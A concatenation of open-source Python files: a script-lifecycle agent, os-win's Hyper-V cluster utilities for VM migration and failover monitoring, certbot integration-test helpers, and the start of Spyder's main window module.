process = self.processes['interrupt']
if process is not None:
process.wait()
# kill all processes
self._kill_all_processes()
def _execute_script(self, command, parameters=''):
script_name = '%s.sh' % command
script_path = join(self.CODE_DIR, script_name)
if not exists(script_path):
self.logger.critical("Script '%s' does not exist in the active code tarball"
% script_name)
return
start_args = [ "bash", script_path ] + parameters.split()
self.processes[command] = Popen(start_args, cwd=self.GENERIC_DIR,
env=self.env, close_fds=True, preexec_fn=os.setsid)
self.logger.info("Script '%s' is running" % script_name)
def _kill_all_processes(self):
self.logger.info("Killing all running processes")
for process in self.processes.values():
if process is not None and process.poll() is None:
try:
pgrp = process.pid
self.logger.debug("Killing process group %s" % pgrp)
os.killpg(pgrp, signal.SIGTERM)
except Exception as e:
self.logger.critical('Failed to kill process group %s' % pgrp)
def _are_scripts_running(self):
for command in ( 'init', 'notify', 'run', 'interrupt', 'cleanup' ):
if self._get_script_status(command) == 'RUNNING':
return True
return False
@expose('GET')
def get_script_status(self, kwargs):
try:
exp_params = []
check_arguments(exp_params, kwargs)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
scripts = {}
for command in ( 'init', 'notify', 'run', 'interrupt', 'cleanup' ):
script_name = "%s.sh" % command
scripts[script_name] = self._get_script_status(command)
return HttpJsonResponse({ 'scripts' : scripts })
def _get_script_status(self, command):
if command not in self.processes or self.processes[command] is None:
return "NEVER STARTED"
returncode = self.processes[command].poll()
if returncode is not None:
return "STOPPED (return code %s)" % returncode
else:
return "RUNNING"
|
clusterutils.py
|
# Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VM related operations on Hyper-V Clusters.
"""
import ctypes
import re
import sys
import threading
import time
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import excutils
from six.moves import queue
from os_win._i18n import _
from os_win import _utils
from os_win import constants
from os_win import exceptions
from os_win.utils import baseutils
from os_win.utils.compute import _clusapi_utils
from os_win.utils.winapi import constants as w_const
from os_win.utils.winapi.libs import clusapi as clusapi_def
from os_win.utils.winapi import wintypes
LOG = logging.getLogger(__name__)
class ClusterUtils(baseutils.BaseUtils):
_MSCLUSTER_NODE = 'MSCluster_Node'
_MSCLUSTER_RES = 'MSCluster_Resource'
_VM_BASE_NAME = 'Virtual Machine %s'
_VM_TYPE = 'Virtual Machine'
_VM_GROUP_TYPE = 111
_MS_CLUSTER_NAMESPACE = '//%s/root/MSCluster'
_LIVE_MIGRATION_TYPE = 4
_IGNORE_LOCKED = 1
_DESTROY_GROUP = 1
_FAILBACK_TRUE = 1
_FAILBACK_WINDOW_MIN = 0
_FAILBACK_WINDOW_MAX = 23
_WMI_EVENT_TIMEOUT_MS = 100
_WMI_EVENT_CHECK_INTERVAL = 2
def __init__(self, host='.'):
self._instance_name_regex = re.compile('Virtual Machine (.*)')
self._clusapi_utils = _clusapi_utils.ClusApiUtils()
if sys.platform == 'win32':
self._init_hyperv_conn(host)
self._watcher = self._get_failover_watcher()
def _init_hyperv_conn(self, host):
try:
self._conn_cluster = self._get_wmi_conn(
self._MS_CLUSTER_NAMESPACE % host)
self._cluster = self._conn_cluster.MSCluster_Cluster()[0]
# extract this node name from cluster's path
path = self._cluster.path_()
self._this_node = re.search(r'\\\\(.*)\\root', path,
re.IGNORECASE).group(1)
except AttributeError:
raise exceptions.HyperVClusterException(
_("Could not initialize cluster wmi connection."))
def _get_failover_watcher(self):
raw_query = ("SELECT * FROM __InstanceModificationEvent "
"WITHIN %(wmi_check_interv)s WHERE TargetInstance ISA "
"'%(cluster_res)s' AND "
"TargetInstance.Type='%(cluster_res_type)s' AND "
"TargetInstance.OwnerNode != PreviousInstance.OwnerNode" %
{'wmi_check_interv': self._WMI_EVENT_CHECK_INTERVAL,
'cluster_res': self._MSCLUSTER_RES,
'cluster_res_type': self._VM_TYPE})
return self._conn_cluster.watch_for(raw_wql=raw_query)
def check_cluster_state(self):
if len(self._get_cluster_nodes()) < 1:
raise exceptions.HyperVClusterException(
_("Not enough cluster nodes."))
def get_node_name(self):
return self._this_node
def _get_cluster_nodes(self):
cluster_assoc = self._conn_cluster.MSCluster_ClusterToNode(
Antecedent=self._cluster.path_())
return [x.Dependent for x in cluster_assoc]
def _get_vm_groups(self):
assocs = self._conn_cluster.MSCluster_ClusterToResourceGroup(
GroupComponent=self._cluster.path_())
resources = [a.PartComponent for a in assocs]
return (r for r in resources if
hasattr(r, 'GroupType') and
r.GroupType == self._VM_GROUP_TYPE)
def _lookup_vm_group_check(self, vm_name):
vm = self._lookup_vm_group(vm_name)
if not vm:
raise exceptions.HyperVVMNotFoundException(vm_name=vm_name)
return vm
def _lookup_vm_group(self, vm_name):
return self._lookup_res(self._conn_cluster.MSCluster_ResourceGroup,
vm_name)
def _lookup_vm_check(self, vm_name):
vm = self._lookup_vm(vm_name)
if not vm:
raise exceptions.HyperVVMNotFoundException(vm_name=vm_name)
return vm
def _lookup_vm(self, vm_name):
vm_name = self._VM_BASE_NAME % vm_name
return self._lookup_res(self._conn_cluster.MSCluster_Resource, vm_name)
def _lookup_res(self, resource_source, res_name):
res = resource_source(Name=res_name)
n = len(res)
if n == 0:
return None
elif n > 1:
raise exceptions.HyperVClusterException(
_('Duplicate resource name %s found.') % res_name)
else:
return res[0]
def get_cluster_node_names(self):
nodes = self._get_cluster_nodes()
return [n.Name for n in nodes]
def get_vm_host(self, vm_name):
return self._lookup_vm_group_check(vm_name).OwnerNode
def list_instances(self):
return [r.Name for r in self._get_vm_groups()]
def list_instance_uuids(self):
return [r.Id for r in self._get_vm_groups()]
def add_vm_to_cluster(self, vm_name):
LOG.debug("Add vm to cluster called for vm %s" % vm_name)
self._cluster.AddVirtualMachine(vm_name)
vm_group = self._lookup_vm_group_check(vm_name)
vm_group.PersistentState = True
vm_group.AutoFailbackType = self._FAILBACK_TRUE
# set the earliest and latest time that the group can be moved
# back to its preferred node. The unit is in hours.
vm_group.FailbackWindowStart = self._FAILBACK_WINDOW_MIN
vm_group.FailbackWindowEnd = self._FAILBACK_WINDOW_MAX
vm_group.put()
def bring_online(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vm.BringOnline()
def take_offline(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vm.TakeOffline()
def delete(self, vm_name):
vm = self._lookup_vm_group_check(vm_name)
vm.DestroyGroup(self._DESTROY_GROUP)
def vm_exists(self, vm_name):
return self._lookup_vm(vm_name) is not None
def live_migrate_vm(self, vm_name, new_host, timeout=None):
self._migrate_vm(vm_name, new_host, self._LIVE_MIGRATION_TYPE,
constants.CLUSTER_GROUP_ONLINE,
timeout)
def _migrate_vm(self, vm_name, new_host, migration_type,
exp_state_after_migr, timeout):
syntax = w_const.CLUSPROP_SYNTAX_LIST_VALUE_DWORD
migr_type = wintypes.DWORD(migration_type)
prop_entries = [
self._clusapi_utils.get_property_list_entry(
w_const.CLUS_RESTYPE_NAME_VM, syntax, migr_type),
self._clusapi_utils.get_property_list_entry(
w_const.CLUS_RESTYPE_NAME_VM_CONFIG, syntax, migr_type)
]
prop_list = self._clusapi_utils.get_property_list(prop_entries)
flags = (
w_const.CLUSAPI_GROUP_MOVE_RETURN_TO_SOURCE_NODE_ON_ERROR |
w_const.CLUSAPI_GROUP_MOVE_QUEUE_ENABLED |
w_const.CLUSAPI_GROUP_MOVE_HIGH_PRIORITY_START)
cluster_handle = None
group_handle = None
dest_node_handle = None
try:
cluster_handle = self._clusapi_utils.open_cluster()
group_handle = self._clusapi_utils.open_cluster_group(
cluster_handle, vm_name)
dest_node_handle = self._clusapi_utils.open_cluster_node(
cluster_handle, new_host)
with _ClusterGroupStateChangeListener(cluster_handle,
vm_name) as listener:
self._clusapi_utils.move_cluster_group(group_handle,
dest_node_handle,
flags,
prop_list)
try:
self._wait_for_cluster_group_migration(
listener,
vm_name,
group_handle,
exp_state_after_migr,
timeout)
except exceptions.ClusterGroupMigrationTimeOut:
with excutils.save_and_reraise_exception() as ctxt:
self._cancel_cluster_group_migration(
listener, vm_name, group_handle,
exp_state_after_migr, timeout)
# This is rather unlikely to happen but we're
# covering it out.
try:
self._validate_migration(group_handle,
vm_name,
exp_state_after_migr,
new_host)
LOG.warning(
'Cluster group migration completed '
'successfuly after cancel attempt. '
'Suppressing timeout exception.')
ctxt.reraise = False
except exceptions.ClusterGroupMigrationFailed:
pass
else:
self._validate_migration(group_handle,
vm_name,
exp_state_after_migr,
new_host)
finally:
if group_handle:
self._clusapi_utils.close_cluster_group(group_handle)
if dest_node_handle:
self._clusapi_utils.close_cluster_node(dest_node_handle)
if cluster_handle:
self._clusapi_utils.close_cluster(cluster_handle)
def _validate_migration(self, group_handle, group_name,
expected_state, expected_node):
state_info = self._clusapi_utils.get_cluster_group_state(group_handle)
owner_node = state_info['owner_node']
group_state = state_info['state']
if (expected_state != group_state or
expected_node.lower() != owner_node.lower()):
raise exceptions.ClusterGroupMigrationFailed(
group_name=group_name,
expected_state=expected_state,
expected_node=expected_node,
group_state=group_state,
owner_node=owner_node)
def cancel_cluster_group_migration(self, group_name, expected_state,
timeout=None):
cluster_handle = None
group_handle = None
try:
cluster_handle = self._clusapi_utils.open_cluster()
group_handle = self._clusapi_utils.open_cluster_group(
cluster_handle, group_name)
with _ClusterGroupStateChangeListener(cluster_handle,
group_name) as listener:
self._cancel_cluster_group_migration(
listener, group_name, group_handle,
expected_state, timeout)
finally:
if group_handle:
self._clusapi_utils.close_cluster_group(group_handle)
if cluster_handle:
self._clusapi_utils.close_cluster(cluster_handle)
def _cancel_cluster_group_migration(self, event_listener,
group_name, group_handle,
expected_state,
timeout=None):
LOG.info("Canceling cluster group '%s' migration", group_name)
try:
cancel_finished = (
self._clusapi_utils.cancel_cluster_group_operation(
group_handle))
except exceptions.Win32Exception as ex:
group_state_info = self._get_cluster_group_state(group_handle)
migration_pending = self._is_migration_pending(
group_state_info['state'],
group_state_info['status_info'],
expected_state)
if (ex.error_code == w_const.ERROR_INVALID_STATE and
not migration_pending):
LOG.debug('Ignoring group migration cancel error. '
'No migration is pending.')
cancel_finished = True
else:
raise
if not cancel_finished:
LOG.debug("Waiting for group migration to be canceled.")
try:
self._wait_for_cluster_group_migration(
event_listener, group_name, group_handle,
expected_state,
timeout=timeout)
except Exception:
LOG.exception("Failed to cancel cluster group migration.")
raise exceptions.JobTerminateFailed()
LOG.info("Cluster group migration canceled.")
def _is_migration_queued(self, group_status_info):
return bool(
group_status_info &
w_const.CLUSGRP_STATUS_WAITING_IN_QUEUE_FOR_MOVE)
def _is_migration_pending(self, group_state, group_status_info,
expected_state):
migration_pending = (
group_state != expected_state or
self._is_migration_queued(group_status_info))
return migration_pending
def _wait_for_cluster_group_migration(self, event_listener,
group_name, group_handle,
expected_state,
timeout=None):
time_start = time.time()
time_left = timeout if timeout else 'undefined'
group_state_info = self._get_cluster_group_state(group_handle)
group_state = group_state_info['state']
group_status_info = group_state_info['status_info']
migration_pending = self._is_migration_pending(
group_state,
group_status_info,
expected_state)
if not migration_pending:
return
while not timeout or time_left > 0:
time_elapsed = time.time() - time_start
time_left = timeout - time_elapsed if timeout else 'undefined'
LOG.debug("Waiting for cluster group '%(group_name)s' "
"migration to finish. "
"Time left: %(time_left)s.",
dict(group_name=group_name,
time_left=time_left))
try:
event = event_listener.get(time_left if timeout else None)
except queue.Empty:
break
group_state = event.get('state', group_state)
group_status_info = event.get('status_info', group_status_info)
migration_pending = self._is_migration_pending(group_state,
group_status_info,
expected_state)
if not migration_pending:
return
LOG.error("Cluster group migration timed out.")
raise exceptions.ClusterGroupMigrationTimeOut(
group_name=group_name,
time_elapsed=time.time() - time_start)
def get_cluster_group_state_info(self, group_name):
"""Gets cluster group state info.
:return: a dict containing the following keys:
['state', 'migration_queued', 'owner_node']
"""
cluster_handle = None
group_handle = None
try:
cluster_handle = self._clusapi_utils.open_cluster()
group_handle = self._clusapi_utils.open_cluster_group(
cluster_handle, group_name)
state_info = self._get_cluster_group_state(group_handle)
migration_queued = self._is_migration_queued(
state_info['status_info'])
return dict(owner_node=state_info['owner_node'],
state=state_info['state'],
migration_queued=migration_queued)
finally:
if group_handle:
self._clusapi_utils.close_cluster_group(group_handle)
if cluster_handle:
self._clusapi_utils.close_cluster(cluster_handle)
def _get_cluster_group_state(self, group_handle):
state_info = self._clusapi_utils.get_cluster_group_state(group_handle)
buff, buff_sz = self._clusapi_utils.cluster_group_control(
group_handle,
w_const.CLUSCTL_GROUP_GET_RO_COMMON_PROPERTIES)
status_info = self._clusapi_utils.get_cluster_group_status_info(
ctypes.byref(buff), buff_sz)
state_info['status_info'] = status_info
return state_info
def monitor_vm_failover(self, callback,
event_timeout_ms=_WMI_EVENT_TIMEOUT_MS):
"""Creates a monitor to check for new WMI MSCluster_Resource
events.
This method will poll the last _WMI_EVENT_CHECK_INTERVAL + 1
seconds for new events and listens for _WMI_EVENT_TIMEOUT_MS
miliseconds, since listening is a thread blocking action.
Any event object caught will then be processed.
"""
# TODO(lpetrut): mark this method as private once compute-hyperv
# stops using it. We should also remove the instance '_watcher'
# attribute since we end up spawning unused event listeners.
vm_name = None
new_host = None
try:
# wait for new event for _WMI_EVENT_TIMEOUT_MS miliseconds.
if patcher.is_monkey_patched('thread'):
wmi_object = tpool.execute(self._watcher,
event_timeout_ms)
else:
wmi_object = self._watcher(event_timeout_ms)
old_host = wmi_object.previous.OwnerNode
new_host = wmi_object.OwnerNode
# wmi_object.Name field is of the form:
# 'Virtual Machine nova-instance-template'
# wmi_object.Name filed is a key and as such is not affected
# by locale, so it will always be 'Virtual Machine'
match = self._instance_name_regex.search(wmi_object.Name)
if match:
vm_name = match.group(1)
if vm_name:
try:
callback(vm_name, old_host, new_host)
except Exception:
LOG.exception(
"Exception during failover callback.")
except exceptions.x_wmi_timed_out:
pass
def get_vm_owner_change_listener(self):
def listener(callback):
while True:
# We avoid setting an infinite timeout in order to let
# the process gracefully stop. Note that the os-win WMI
# event listeners are meant to be used as long running
# daemons, so no stop API is provided ATM.
try:
self.monitor_vm_failover(
callback,
constants.DEFAULT_WMI_EVENT_TIMEOUT_MS)
except Exception:
LOG.exception("The VM cluster group owner change "
"event listener encountered an "
"unexpected exception.")
time.sleep(constants.DEFAULT_WMI_EVENT_TIMEOUT_MS / 1000)
return listener
# At the moment, those event listeners are not meant to be used outside
# os-win, mostly because of the underlying API limitations.
class _ClusterEventListener(object):
_notif_keys = {}
_notif_port_h = None
_cluster_handle = None
_running = False
def __init__(self, cluster_handle, notif_filters_list):
self._cluster_handle = cluster_handle
self._notif_filters_list = notif_filters_list
self._clusapi_utils = _clusapi_utils.ClusApiUtils()
self._event_queue = queue.Queue()
self._setup()
def __enter__(self):
self._ensure_listener_running()
return self
def _get_notif_key_dw(self, notif_key):
notif_key_dw = self._notif_keys.get(notif_key)
if notif_key_dw is None:
notif_key_dw = wintypes.DWORD(notif_key)
# We have to make sure those addresses are preserved.
self._notif_keys[notif_key] = notif_key_dw
return notif_key_dw
def _add_filter(self, notif_filter, notif_key=0):
notif_key_dw = self._get_notif_key_dw(notif_key)
# We'll get a notification handle if not already existing.
self._notif_port_h = self._clusapi_utils.create_cluster_notify_port_v2(
self._cluster_handle, notif_filter,
self._notif_port_h, notif_key_dw)
def _setup_notif_port(self):
for notif_filter in self._notif_filters_list:
filter_struct = clusapi_def.NOTIFY_FILTER_AND_TYPE(
dwObjectType=notif_filter['object_type'],
FilterFlags=notif_filter['filter_flags'])
notif_key = notif_filter.get('notif_key', 0)
self._add_filter(filter_struct, notif_key)
def _setup(self):
self._setup_notif_port()
# If eventlet monkey patching is used, this will actually be a
# greenthread. We just don't want to enforce eventlet usage.
worker = threading.Thread(target=self._listen)
worker.setDaemon(True)
self._running = True
worker.start()
def __exit__(self, exc_type, exc_value, traceback):
self.stop()
def _signal_stopped(self):
self._running = False
self._event_queue.put(None)
def stop(self):
self._signal_stopped()
if self._notif_port_h:
self._clusapi_utils.close_cluster_notify_port(self._notif_port_h)
def _listen(self):
while self._running:
try:
# We're using an indefinite timeout here. When the listener is
# closed, this will raise an 'invalid handle value' error,
# which we're going to ignore.
event = _utils.avoid_blocking_call(
self._clusapi_utils.get_cluster_notify_v2,
self._notif_port_h,
timeout_ms=-1)
processed_event = self._process_event(event)
if processed_event:
self._event_queue.put(processed_event)
except Exception:
if self._running:
LOG.exception(
"Unexpected exception in event listener loop. "
"The cluster event listener will now close.")
self._signal_stopped()
def _process_event(self, event):
return event
def get(self, timeout=None):
self._ensure_listener_running()
event = self._event_queue.get(timeout=timeout)
self._ensure_listener_running()
return event
def _ensure_listener_running(self):
if not self._running:
raise exceptions.OSWinException(
_("Cluster event listener is not running."))
class _ClusterGroupStateChangeListener(_ClusterEventListener):
_NOTIF_KEY_GROUP_STATE = 0
_NOTIF_KEY_GROUP_COMMON_PROP = 1
_notif_filters_list = [
dict(object_type=w_const.CLUSTER_OBJECT_TYPE_GROUP,
filter_flags=w_const.CLUSTER_CHANGE_GROUP_STATE_V2,
notif_key=_NOTIF_KEY_GROUP_STATE),
dict(object_type=w_const.CLUSTER_OBJECT_TYPE_GROUP,
filter_flags=w_const.CLUSTER_CHANGE_GROUP_COMMON_PROPERTY_V2,
notif_key=_NOTIF_KEY_GROUP_COMMON_PROP)]
def __init__(self, cluster_handle, group_name=None):
self._group_name = group_name
super(_ClusterGroupStateChangeListener, self).__init__(
cluster_handle, self._notif_filters_list)
def _process_event(self, event):
group_name = event['cluster_object_name']
if self._group_name and self._group_name.lower() != group_name.lower():
return
preserved_keys = ['cluster_object_name', 'object_type',
'filter_flags', 'notif_key']
processed_event = {key: event[key] for key in preserved_keys}
notif_key = event['notif_key']
if notif_key == self._NOTIF_KEY_GROUP_STATE:
if event['buff_sz'] != ctypes.sizeof(wintypes.DWORD):
raise exceptions.ClusterPropertyRetrieveFailed()
state_p = ctypes.cast(event['buff'], wintypes.PDWORD)
state = state_p.contents.value
processed_event['state'] = state
return processed_event
elif notif_key == self._NOTIF_KEY_GROUP_COMMON_PROP:
try:
status_info = (
self._clusapi_utils.get_cluster_group_status_info(
ctypes.byref(event['buff']), event['buff_sz']))
processed_event['status_info'] = status_info
return processed_event
except exceptions.ClusterPropertyListEntryNotFound:
# At the moment, we only care about the 'StatusInformation'
# common property.
pass
|
misc.py
|
"""
Misc module contains stateless functions that could be used during pytest execution,
or outside during setup/teardown of the integration tests environment.
"""
import contextlib
import errno
import functools
import http.server as SimpleHTTPServer
import os
import re
import shutil
import socketserver
import stat
import sys
import tempfile
import threading
import time
import warnings
from typing import Generator
from typing import Iterable
from typing import List
from typing import Optional
from typing import Tuple
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.serialization import Encoding
from cryptography.hazmat.primitives.serialization import NoEncryption
from cryptography.hazmat.primitives.serialization import PrivateFormat
from cryptography.x509 import load_pem_x509_certificate
from cryptography.x509 import Certificate
from OpenSSL import crypto
import pkg_resources
import requests
from certbot_integration_tests.certbot_tests.context import IntegrationTestsContext
from certbot_integration_tests.utils.constants import PEBBLE_ALTERNATE_ROOTS
from certbot_integration_tests.utils.constants import PEBBLE_MANAGEMENT_URL
RSA_KEY_TYPE = 'rsa'
ECDSA_KEY_TYPE = 'ecdsa'
def _suppress_x509_verification_warnings() -> None:
try:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except ImportError:
# Handle old versions of request with vendorized urllib3
# pylint: disable=no-member
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings( # type: ignore[attr-defined]
InsecureRequestWarning)
def check_until_timeout(url: str, attempts: int = 30) -> None:
"""
Wait and block until given url responds with status 200, or raise an exception
after the specified number of attempts.
:param str url: the URL to test
:param int attempts: the number of times to try to connect to the URL
:raise ValueError: exception raised if unable to reach the URL
"""
_suppress_x509_verification_warnings()
for _ in range(attempts):
time.sleep(1)
try:
if requests.get(url, verify=False).status_code == 200:
return
except requests.exceptions.ConnectionError:
pass
raise ValueError('Error, url did not respond after {0} attempts: {1}'.format(attempts, url))
class GracefulTCPServer(socketserver.TCPServer):
"""
This subclass of TCPServer allows graceful reuse of an address that has
just been released by another instance of TCPServer.
"""
allow_reuse_address = True
@contextlib.contextmanager
def create_http_server(port: int) -> Generator[str, None, None]:
"""
Setup and start an HTTP server for the given TCP port.
This server stays active for the lifetime of the context, and is automatically
stopped with context exit, while its temporary webroot is deleted.
:param int port: the TCP port to use
:return str: the temporary webroot attached to this server
"""
with tempfile.TemporaryDirectory() as webroot:
# Setting the directory argument of SimpleHTTPRequestHandler causes
# files to be served from that directory.
handler = functools.partial(SimpleHTTPServer.SimpleHTTPRequestHandler, directory=webroot)
server = GracefulTCPServer(('', port), handler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
try:
check_until_timeout('http://localhost:{0}/'.format(port))
yield webroot
finally:
server.shutdown()
thread.join()
server.server_close()
def list_renewal_hooks_dirs(config_dir: str) -> List[str]:
"""
Find and return paths of all hook directories for the given certbot config directory
:param str config_dir: path to the certbot config directory
:return str[]: list of path to the standard hooks directory for this certbot instance
"""
renewal_hooks_root = os.path.join(config_dir, 'renewal-hooks')
return [os.path.join(renewal_hooks_root, item) for item in ['pre', 'deploy', 'post']]
def generate_test_file_hooks(config_dir: str, hook_probe: str) -> None:
"""
Create a suite of certbot hook scripts and put them in the relevant hook directory
for the given certbot configuration directory. These scripts, when executed, will write
specific verbs in the given hook_probe file to allow asserting they have effectively
been executed. The deploy hook also checks that the renewal environment variables are set.
:param str config_dir: current certbot config directory
:param str hook_probe: path to the hook probe to test hook scripts execution
"""
hook_path = pkg_resources.resource_filename('certbot_integration_tests', 'assets/hook.py')
for hook_dir in list_renewal_hooks_dirs(config_dir):
# We want an equivalent of bash `chmod -p $HOOK_DIR, that does not fail if one folder of
# the hierarchy already exists. It is not the case of os.makedirs. Python 3 has an
# optional parameter `exists_ok` to not fail on existing dir, but Python 2.7 does not.
# So we pass through a try except pass for it. To be removed with dropped support on py27.
try:
os.makedirs(hook_dir)
except OSError as error:
if error.errno != errno.EEXIST:
raise
if os.name != 'nt':
entrypoint_script_path = os.path.join(hook_dir, 'entrypoint.sh')
entrypoint_script = '''\
#!/usr/bin/env bash
set -e
"{0}" "{1}" "{2}" >> "{3}"
'''.format(sys.executable, hook_path, entrypoint_script_path, hook_probe)
else:
entrypoint_script_path = os.path.join(hook_dir, 'entrypoint.ps1')
entrypoint_script = '''\
& "{0}" "{1}" "{2}" >> "{3}"
'''.format(sys.executable, hook_path, entrypoint_script_path, hook_probe)
with open(entrypoint_script_path, 'w') as file_h:
file_h.write(entrypoint_script)
os.chmod(entrypoint_script_path, os.stat(entrypoint_script_path).st_mode | stat.S_IEXEC)
@contextlib.contextmanager
def manual_http_hooks(http_server_root: str,
http_port: int) -> Generator[Tuple[str, str], None, None]:
"""
Generate suitable http-01 hooks command for test purpose in the given HTTP
server webroot directory. These hooks command use temporary python scripts
that are deleted upon context exit.
:param str http_server_root: path to the HTTP server configured to serve http-01 challenges
:param int http_port: HTTP port that the HTTP server listen on
:return (str, str): a tuple containing the authentication hook and cleanup hook commands
"""
tempdir = tempfile.mkdtemp()
try:
auth_script_path = os.path.join(tempdir, 'auth.py')
with open(auth_script_path, 'w') as file_h:
file_h.write('''\
#!/usr/bin/env python
import os
import requests
import time
import sys
challenge_dir = os.path.join('{0}', '.well-known', 'acme-challenge')
os.makedirs(challenge_dir)
challenge_file = os.path.join(challenge_dir, os.environ.get('CERTBOT_TOKEN'))
with open(challenge_file, 'w') as file_h:
file_h.write(os.environ.get('CERTBOT_VALIDATION'))
url = 'http://localhost:{1}/.well-known/acme-challenge/' + os.environ.get('CERTBOT_TOKEN')
for _ in range(0, 10):
time.sleep(1)
try:
if request.get(url).status_code == 200:
sys.exit(0)
except requests.exceptions.ConnectionError:
pass
raise ValueError('Error, url did not respond after 10 attempts: {{0}}'.format(url))
'''.format(http_server_root.replace('\\', '\\\\'), http_port))
os.chmod(auth_script_path, 0o755)
cleanup_script_path = os.path.join(tempdir, 'cleanup.py')
with open(cleanup_script_path, 'w') as file_h:
file_h.write('''\
#!/usr/bin/env python
import os
import shutil
well_known = os.path.join('{0}', '.well-known')
shutil.rmtree(well_known)
'''.format(http_server_root.replace('\\', '\\\\')))
os.chmod(cleanup_script_path, 0o755)
yield ('{0} {1}'.format(sys.executable, auth_script_path),
'{0} {1}'.format(sys.executable, cleanup_script_path))
finally:
shutil.rmtree(tempdir)
def generate_csr(domains: Iterable[str], key_path: str, csr_path: str,
key_type: str = RSA_KEY_TYPE) -> None:
"""
Generate a private key, and a CSR for the given domains using this key.
:param domains: the domain names to include in the CSR
:type domains: `list` of `str`
:param str key_path: path to the private key that will be generated
:param str csr_path: path to the CSR that will be generated
:param str key_type: type of the key (misc.RSA_KEY_TYPE or misc.ECDSA_KEY_TYPE)
"""
if key_type == RSA_KEY_TYPE:
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 2048)
elif key_type == ECDSA_KEY_TYPE:
with warnings.catch_warnings():
# Ignore a warning on some old versions of cryptography
warnings.simplefilter('ignore', category=PendingDeprecationWarning)
_key = ec.generate_private_key(ec.SECP384R1(), default_backend())
# This type ignore directive is required due to an outdated version of types-cryptography.
# It can be removed once package types-pyOpenSSL depends on cryptography instead of
# types-cryptography and so types-cryptography is not installed anymore.
# See https://github.com/python/typeshed/issues/5618
_bytes = _key.private_bytes(encoding=Encoding.PEM, # type: ignore
format=PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=NoEncryption())
key = crypto.load_privatekey(crypto.FILETYPE_PEM, _bytes)
else:
raise ValueError('Invalid key type: {0}'.format(key_type))
with open(key_path, 'wb') as file_h:
file_h.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
req = crypto.X509Req()
san = ', '.join('DNS:{0}'.format(item) for item in domains)
san_constraint = crypto.X509Extension(b'subjectAltName', False, san.encode('utf-8'))
req.add_extensions([san_constraint])
req.set_pubkey(key)
req.set_version(2)
req.sign(key, 'sha256')
with open(csr_path, 'wb') as file_h:
file_h.write(crypto.dump_certificate_request(crypto.FILETYPE_ASN1, req))
def read_certificate(cert_path: str) -> str:
"""
Load the certificate from the provided path, and return a human readable version
of it (TEXT mode).
:param str cert_path: the path to the certificate
:returns: the TEXT version of the certificate, as it would be displayed by openssl binary
"""
with open(cert_path, 'rb') as file:
data = file.read()
cert = crypto.load_certificate(crypto.FILETYPE_PEM, data)
return crypto.dump_certificate(crypto.FILETYPE_TEXT, cert).decode('utf-8')
def load_sample_data_path(workspace: str) -> str:
"""
Load the certbot configuration example designed to make OCSP tests, and return its path
:param str workspace: current test workspace directory path
:returns: the path to the loaded sample data directory
:rtype: str
"""
original = pkg_resources.resource_filename('certbot_integration_tests', 'assets/sample-config')
copied = os.path.join(workspace, 'sample-config')
shutil.copytree(original, copied, symlinks=True)
if os.name == 'nt':
# Fix the symlinks on Windows if GIT is not configured to create them upon checkout
for lineage in [
'a.encryption-example.com',
'b.encryption-example.com',
'c.encryption-example.com',
]:
current_live = os.path.join(copied, 'live', lineage)
for name in os.listdir(current_live):
if name != 'README':
current_file = os.path.join(current_live, name)
if not os.path.islink(current_file):
with open(current_file) as file_h:
src = file_h.read()
os.unlink(current_file)
os.symlink(os.path.join(current_live, src), current_file)
return copied
def echo(keyword: str, path: Optional[str] = None) -> str:
"""
Generate a platform independent executable command
that echoes the given keyword into the given file.
:param keyword: the keyword to echo (must be a single keyword)
:param path: path to the file were keyword is echoed
:return: the executable command
"""
if not re.match(r'^\w+$', keyword):
raise ValueError('Error, keyword `{0}` is not a single keyword.'
.format(keyword))
return '{0} -c "print(\'{1}\')"{2}'.format(
os.path.basename(sys.executable), keyword, ' >> "{0}"'.format(path) if path else '')
def get_acme_issuers(context: IntegrationTestsContext) -> List[Certificate]:
"""Gets the list of one or more issuer certificates from the ACME server used by the
context.
:param context: the testing context.
:return: the `list of x509.Certificate` representing the list of issuers.
"""
# TODO: in fact, Boulder has alternate chains in config-next/, just not yet in config/.
if context.acme_server != "pebble":
raise NotImplementedError()
_suppress_x509_verification_warnings()
issuers = []
for i in range(PEBBLE_ALTERNATE_ROOTS + 1):
request = requests.get(PEBBLE_MANAGEMENT_URL + '/intermediates/{}'.format(i), verify=False)
issuers.append(load_pem_x509_certificate(request.content, default_backend()))
return issuers
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import glob
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QMainWindow, QMenu,
